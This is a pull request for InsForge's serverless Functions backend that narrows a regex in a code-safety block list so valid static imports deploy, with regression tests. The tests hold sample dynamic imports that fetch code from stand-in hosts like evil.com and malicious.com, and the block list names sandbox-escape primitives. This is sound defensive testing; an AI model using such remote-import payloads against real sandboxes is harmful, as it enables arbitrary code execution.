### PR TITLE
fix(functions): dynamic-import regex falsely rejects valid static imports

### DIFF
--- a/backend/src/services/functions/function.service.ts
+++ b/backend/src/services/functions/function.service.ts
@@ -367,7 +367,7 @@ export class FunctionService {
       /\bself\b/i,
       /\bprocess\b/i,
       /Deno\.(run|spawn|Command|makeTemp|remove|write|chmod|chown)/i,
-      /\bimport\b[^;]*\(/i, // Block dynamic imports even with comments (e.g., import /* */ ('...'))
+      /\bimport\s*(?:\/\*[^]*?\*\/\s*)?\(/i, // Block dynamic import(...) / import /* */ (...). Anchored on whitespace/comment only — the old /\bimport\b[^;]*\(/ spanned newlines (semicolon-less static imports) to a later '(' like function(req), falsely rejecting valid `import x from '...'`.
       /require\b/i,
       /eval\b/i,
       /\bFunction\s*\(/, // Case-sensitive: Block constructor but allow 'function' keyword

--- a/backend/tests/unit/function-security.test.ts
+++ b/backend/tests/unit/function-security.test.ts
@@ -131,9 +131,47 @@ describe('FunctionService Security Validation (Public API)', () => {
       await expect(createTestFunction(code)).resolves.toBeDefined();
     });
 
+    it('should allow the canonical docs example (semicolon-less static import + function)', async () => {
+      // Regression: the old /\bimport\b[^;]*\(/ matched across newlines from a
+      // semicolon-less `import` to the '(' in `function(req)`, falsely rejecting
+      // every function that imported anything. This is the exact docs example.
+      const code = [
+        "import { createClient } from 'npm:@insforge/sdk'",
+        '',
+        'export default async function(req) {',
+        "  return new Response('hello')",
+        '}',
+      ].join('\n');
+      mockClient.query.mockResolvedValueOnce({});
+      mockClient.query.mockResolvedValueOnce({});
+      mockClient.query.mockResolvedValueOnce({ rows: [{ id: '1' }] });
+      await expect(createTestFunction(code)).resolves.toBeDefined();
+    });
+
+    it('should allow a static import followed by String.fromCharCode (no false positive)', async () => {
+      const code = [
+        "import { createClient } from 'npm:@insforge/sdk'",
+        "const tag = String.fromCharCode(72, 105)",
+        'export default async function(req) { return new Response(tag) }',
+      ].join('\n');
+      mockClient.query.mockResolvedValueOnce({});
+      mockClient.query.mockResolvedValueOnce({});
+      mockClient.query.mockResolvedValueOnce({ rows: [{ id: '1' }] });
+      await expect(createTestFunction(code)).resolves.toBeDefined();
+    });
+
     it('should block dynamic import() calls', async () => {
       const code = 'import("http://malicious.com/payload.js")';
       await expect(createTestFunction(code)).rejects.toThrow(GENERIC_ERROR);
+    });
+
+    it('should block dynamic import() with whitespace and block comment', async () => {
+      await expect(createTestFunction('import ("http://evil.com/x.js")')).rejects.toThrow(
+        GENERIC_ERROR
+      );
+      await expect(createTestFunction('import /* sneaky */ ("http://evil.com/x.js")')).rejects.toThrow(
+        GENERIC_ERROR
+      );
     });
 
     it('should block require keyword', async () => {


### PR DESCRIPTION
## Problem

Functions deploy rejects almost everything with **"Code contains a potentially dangerous pattern"** — including the canonical docs example:
```ts
import { createClient } from 'npm:@insforge/sdk'
```
Also rejected: any static import, any later `(`, even `String.fromCharCode(...)`. Only a no-import `export default async function(req) { ... }` deploys. Meanwhile `diagnose --ai` correctly says imports are allowed.

## Root cause

`backend/src/services/functions/function.service.ts` validated against:
```js
/\bimport\b[^;]*\(/i  // intended to block dynamic import()
```
`[^;]` matches newlines, and TS/Deno semicolons are optional. So for a semicolon-less static import the pattern spans from `import` across newlines to the next `(` — almost always the `(` in `export default async function(req)`. Every function importing anything gets falsely flagged. (The existing unit test passed only because it used a trailing `;` right after the import, which the real docs example omits.)

## Fix

```js
/\bimport\s*(?:\/\*[^]*?\*\/\s*)?\(/i
```
Matches only an actual dynamic-import call — `import(`, `import (`, or `import /* */ (` — and never spans a statement to an unrelated `(`.

## Verification

Ran the full `validateCode` pattern set against 18 cases (could not use the vitest harness on this box — deps not installed — so replicated the exact regex array in a standalone script):

**Now allowed (were wrongly blocked):** canonical docs example (semicolon-less import + function), import + `String.fromCharCode`, import-with-semicolon.
**Still blocked (security preserved):** `import(`, `import (`, `import /* */ (`, `self`, `process`, `require`, `eval`, `Function()`, `__proto__`, `Deno[...]`, `Deno.serve`, `globalThis`.

Added regression unit tests in `function-security.test.ts` for the semicolon-less import and the whitespace/comment dynamic-import forms.

## Impact

P0 for the cloud Functions product — every user whose function imports anything (i.e. almost all real functions) currently fails to deploy.


<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Fixes Functions deploy validation falsely blocking static imports. Updates the dynamic-import regex to only match real `import(...)` calls, unblocking valid code while keeping dangerous patterns blocked.

- **Bug Fixes**
  - Replace `/\bimport\b[^;]*\(/i` with `/\bimport\s*(?:\/\*[^]*?\*\/\s*)?\(/i` to detect only dynamic imports.
  - Unblocks semicolon-less static imports, including `import { createClient } from 'npm:@insforge/sdk'`.
  - Adds regression tests for semicolon-less imports and whitespace/comment variants of `import(...)`.
  - Re-verified other guards remain effective (`self`, `process`, `require`, `eval`, `Function()`, `__proto__`, `Deno.*`, `Deno.serve`, `globalThis`).

<sup>Written for commit cdbda13ac5b76951f29ca0f5f87b04e8672a4bfa. Summary will update on new commits. <a href="https://cubic.dev/pr/InsForge/InsForge/pull/1317?utm_source=github">Review in cubic</a></sup>

<!-- End of auto-generated description by cubic. -->



<!-- Macroscope's pull request summary starts here -->
<!-- Macroscope will only edit the content between these invisible markers, and the markers themselves will not be visible in the GitHub rendered markdown. -->
<!-- If you delete either of the start / end markers from your PR's description, Macroscope will append its summary at the bottom of the description. -->
> [!NOTE]
> ### Fix dynamic import regex in `dangerousPatterns` to avoid false positives on static imports
> The previous regex `/\bimport\b[^;]*(\(/i` matched across newlines, causing static `import` statements followed by an unrelated `(` token to be incorrectly flagged. The new regex `/\bimport\s*(?:\/\*[^]*?\*\/\s*)?\(/i` anchors the match to `import(...)` call syntax, allowing optional whitespace or a block comment between `import` and `(`. New unit tests in [function-security.test.ts](https://github.com/InsForge/InsForge/pull/1317/files#diff-501e4e257ef12dbb860d51776ad1ed675576f1c782ef5050a81a79573087e855) cover the fixed cases.
>
> <!-- Macroscope's review summary starts here -->
>
> <sup><a href="https://app.macroscope.com">Macroscope</a> summarized cdbda13.</sup>
> <!-- Macroscope's review summary ends here -->
>
<!-- macroscope-ui-refresh -->
<!-- Macroscope's pull request summary ends here -->